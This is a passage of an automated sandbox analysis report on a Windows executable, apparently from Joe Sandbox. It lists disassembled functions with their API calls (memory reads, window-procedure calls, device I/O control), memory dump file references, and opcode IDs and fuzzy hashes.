                                                                • Instruction Fuzzy Hash: 1C112A34D80208FBDB60AF91DD06FADBB31EF41711F50806AB50439191D77A4A61AF5A
                                                                Function 004529CC Relevance: 2.4, APIs: 1, Instructions: 936COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RtlMoveMemory.NTDLL(0044CBC7,00000000,00000028), ref: 00452AB5
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: MemoryMove
                                                                • String ID:
                                                                • API String ID: 1951056069-0
                                                                • Opcode ID: 8e68fb91e7b84e84ba91dd155aedec2eba7f6270f44d8cdfa5a40e5e445ebcf9
                                                                • Instruction ID: f130bc8f3daf23233fe6a1441034e36f74e799423679edd82cba9286e9b9d39d
                                                                • Opcode Fuzzy Hash: 8e68fb91e7b84e84ba91dd155aedec2eba7f6270f44d8cdfa5a40e5e445ebcf9
                                                                • Instruction Fuzzy Hash: 226274B1E40215AFEB40DFA5DCC6F9DB7B4EB0D315F14402AEA04BA382D6756E148B29
                                                                Function 0047476F Relevance: 2.0, APIs: 1, Instructions: 466COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • WideCharToMultiByte.KERNEL32(000003A8,00000000,00000000,00000000,00000000,00000000,004FEE9E,00000000,?,?,?,00000000,00000008,00000000,?), ref: 00474BA9
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ByteCharMultiWide
                                                                • String ID:
                                                                • API String ID: 626452242-0
                                                                • Opcode ID: c1b8676275f077534766f835ae38481f811d533a99e1c8f17a461168a0cc88e4
                                                                • Instruction ID: 09536dc6592b86cd4257958853dadd12cf47d45e4c0db7be923c644e92f78aa7
                                                                • Opcode Fuzzy Hash: c1b8676275f077534766f835ae38481f811d533a99e1c8f17a461168a0cc88e4
                                                                • Instruction Fuzzy Hash: 7BF16BB0E00208FBEB10DF95ED86BEEBBB9EF48304F14402AF604B6281D7795955CB59
                                                                Function 00478272 Relevance: 2.0, APIs: 1, Instructions: 450COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • WideCharToMultiByte.KERNEL32(000003A8,00000000,00000000,00000000,00000000,00000000,004FEE9E,00000000,?,?,?,00000000,00000008,00000000,?), ref: 004786AC
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ByteCharMultiWide
                                                                • String ID:
                                                                • API String ID: 626452242-0
                                                                • Opcode ID: 3e36fa71d14d125d27c04430d3316d083062530534bd2eede32360b4f4d11794
                                                                • Instruction ID: a6d7b5c5fe38f9d50ead1c175468bdbfbf9e8e303d5d2fa4db6d16fffd05241e
                                                                • Opcode Fuzzy Hash: 3e36fa71d14d125d27c04430d3316d083062530534bd2eede32360b4f4d11794
                                                                • Instruction Fuzzy Hash: A2F14FB1E4020CBBEB00DF95EC89BEEBBB8EF08704F14402AF508BA291D7755955CB59
                                                                Function 00482D34 Relevance: 1.9, APIs: 1, Instructions: 359COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 004809EB: ReadProcessMemory.KERNEL32(00000000,004807B0,00000000,00000004,00000000,?,004807B0), ref: 00480A19
                                                                • CallWindowProcA.USER32(00668787,?,?,00000004,00000000), ref: 004831A0
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CallMemoryProcProcessReadWindow
                                                                • String ID:
                                                                • API String ID: 95754710-0
                                                                • Opcode ID: a288871662ad259032025310c0ccdc832cf0709ef8aa746028a01125df205660
                                                                • Instruction ID: 082d369041031c277871413530de86cee25f6c986bb4ce4b12ca580ab02ba2bd
                                                                • Opcode Fuzzy Hash: a288871662ad259032025310c0ccdc832cf0709ef8aa746028a01125df205660
                                                                • Instruction Fuzzy Hash: C8E126B0E00219ABDB40EF99DCC6B9DBBB0FB0D304F40446AE604BB396D7B95951CB65
                                                                Function 00480CFD Relevance: 1.9, APIs: 1, Instructions: 351COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 004809EB: ReadProcessMemory.KERNEL32(00000000,004807B0,00000000,00000004,00000000,?,004807B0), ref: 00480A19
                                                                • CallWindowProcA.USER32(00668787,?,?,00000003,00000000), ref: 00481156
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CallMemoryProcProcessReadWindow
                                                                • String ID:
                                                                • API String ID: 95754710-0
                                                                • Opcode ID: 15c86dc224628a425dc13c868736417fccd121c46bbe5f98210bb436d314f9bf
                                                                • Instruction ID: 740dc97f675e35762054187d4d95d2e1dfd8a28f4b4b68ea2c409bb55c4226ed
                                                                • Opcode Fuzzy Hash: 15c86dc224628a425dc13c868736417fccd121c46bbe5f98210bb436d314f9bf
                                                                • Instruction Fuzzy Hash: 3EE1DEB4E00219AFDB00DF95D8C6A9EBBB4FF0D304F1004AAE605BB362D7766951CB65
                                                                Function 004BEC9B Relevance: 1.8, APIs: 1, Instructions: 275COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0d66f08d375267febf97f0a912acb0c7fb8c5e52a0f85875a41395f4d79b2d71
                                                                • Instruction ID: b92bb4614d61b733a9d247b35fdea048afeeaf1166cfc3d429aa77091c6bf60c
                                                                • Opcode Fuzzy Hash: 0d66f08d375267febf97f0a912acb0c7fb8c5e52a0f85875a41395f4d79b2d71
                                                                • Instruction Fuzzy Hash: 3EB1D130900219EBDF10AFA6DC867EE7B71BF58314F10452AF204752E1D7BA4974DBAA
                                                                Function 004806F0 Relevance: 1.7, APIs: 1, Instructions: 229COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 004809EB: ReadProcessMemory.KERNEL32(00000000,004807B0,00000000,00000004,00000000,?,004807B0), ref: 00480A19
                                                                • CallWindowProcA.USER32(00668787,?,?,00000003,00000000), ref: 004809A3
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CallMemoryProcProcessReadWindow
                                                                • String ID:
                                                                • API String ID: 95754710-0
                                                                • Opcode ID: 49e8d14f20b08736df05c92b4cd23643ce200a51b43d6ea8bf44cd5807549bec
                                                                • Instruction ID: 6f011f135e5d8a428f56042da7b4c01adbbdea83b38b0f32c898bdaba9ab014e
                                                                • Opcode Fuzzy Hash: 49e8d14f20b08736df05c92b4cd23643ce200a51b43d6ea8bf44cd5807549bec
                                                                • Instruction Fuzzy Hash: EC9104B4E00219AFDB40DF99D8C6B9EBBB4FB0D304F10046AE604BB352D7755954CB66
                                                                Function 00490852 Relevance: 1.7, APIs: 1, Instructions: 218COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • PathFindFileNameA.SHLWAPI(00000001,?,?,?,?,?,?,?,?,00490764,00000000,00000001), ref: 0049086A
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FileFindNamePath
                                                                • String ID:
                                                                • API String ID: 1422272338-0
                                                                • Opcode ID: 84d0613788450ac12b89ec697ec6c51b270993614f20196e08a458e3a61f14c2
                                                                • Instruction ID: ddbbf336ee54d51a8e4e346dd17e0d56589a0c5badab37533b9b58c953c772ea
                                                                • Opcode Fuzzy Hash: 84d0613788450ac12b89ec697ec6c51b270993614f20196e08a458e3a61f14c2
                                                                • Instruction Fuzzy Hash: 0A614BB1F00305BFFF10ABA59D86BAF7AB8DB14304F14407AFA44B6282D6799E108759
                                                                Function 0049E4EB Relevance: 1.7, APIs: 1, Instructions: 203COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • DeviceIoControl.KERNEL32(?,00222014,?,00000018,?,00000008,?,00000000), ref: 0049E640
                                                                  • Part of subcall function 004CB120: MessageBoxA.USER32(00000000,00000000,0069258C,?), ref: 004CB343
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ControlDeviceMessage
                                                                • String ID:
                                                                • API String ID: 1404884426-0
                                                                • Opcode ID: 6d74fd6f1cabd798fdc0abbe88787cef1b671a2be1b2ab4f9e73275870587b2c
                                                                • Instruction ID: 0a4a85033bf19e8db2dad349dcb4674adee292d03c2e9feedd84d13c7cd7c192
                                                                • Opcode Fuzzy Hash: 6d74fd6f1cabd798fdc0abbe88787cef1b671a2be1b2ab4f9e73275870587b2c
                                                                • Instruction Fuzzy Hash: 177165B0E40309EBDF10DFD5DD86BAEBBB4AF08314F20406AE6147B391D7795A108B66
                                                                Function 0049C811 Relevance: 1.7, APIs: 1, Instructions: 196COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • DeviceIoControl.KERNEL32(?,00222048,?,00000018,?,00000008,?,00000000), ref: 0049C973
                                                                  • Part of subcall function 004CB120: MessageBoxA.USER32(00000000,00000000,0069258C,?), ref: 004CB343
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ControlDeviceMessage
                                                                • String ID:
                                                                • API String ID: 1404884426-0
                                                                • Opcode ID: f7088646b29ca34313ec5ccab273d3104602d0a40b59979059404d2b8059df52
                                                                • Instruction ID: e00af882239d7b347fe9c67c301ebd534e22ce9c7bf62c0a5a5fde76a62631fd
                                                                • Opcode Fuzzy Hash: f7088646b29ca34313ec5ccab273d3104602d0a40b59979059404d2b8059df52
                                                                • Instruction Fuzzy Hash: 107112B1E40309EBDF10DF95CDC6BAE7BB4AB19314F10402AE6057B391D3795A508BA9
                                                                Function 0049E790 Relevance: 1.7, APIs: 1, Instructions: 193COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • DeviceIoControl.KERNEL32(?,?,?,00000018,?,00000008,?,00000000), ref: 0049E8E5
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ControlDevice
                                                                • String ID:
                                                                • API String ID: 2352790924-0
                                                                • Opcode ID: e831a275df95eeb10890ba1b634f20a658ccec75415fbddf49917d616db861e0
                                                                • Instruction ID: 5bd4aa697ac1034cf580349c3c08ade346b8d825d2ea0b0711e7f5e3ded653b0
                                                                • Opcode Fuzzy Hash: e831a275df95eeb10890ba1b634f20a658ccec75415fbddf49917d616db861e0
                                                                • Instruction Fuzzy Hash: 7F6136F1E40309ABDF50DF96DD86BAEBFB4AF08304F10407AE60477291D6795A50CB59
                                                                Function 0040461E Relevance: 1.7, APIs: 1, Instructions: 189COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • IIDFromString.COMBASE(?,00000000), ref: 004046F4
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FromString
                                                                • String ID:
                                                                • API String ID: 1694596556-0
                                                                • Opcode ID: 95a4f50a84fbc9b96cd7957e7a7656921229c88b308757b5cf856cd9de23669c
                                                                • Instruction ID: a8b6aab28b1d87ca97166e21ed405e2568da21e9315250d96a033eccf1f9a1a5
                                                                • Opcode Fuzzy Hash: 95a4f50a84fbc9b96cd7957e7a7656921229c88b308757b5cf856cd9de23669c
                                                                • Instruction Fuzzy Hash: 095183F2E002159BEB40DB69ECC1B5AB7E8EF59324F180036E905EB341E779AD14C766
                                                                Function 0049E283 Relevance: 1.7, APIs: 1, Instructions: 186COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • DeviceIoControl.KERNEL32(?,00222014,?,00000018,?,00000008,?,00000000), ref: 0049E3CA
                                                                  • Part of subcall function 004CB120: MessageBoxA.USER32(00000000,00000000,0069258C,?), ref: 004CB343
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
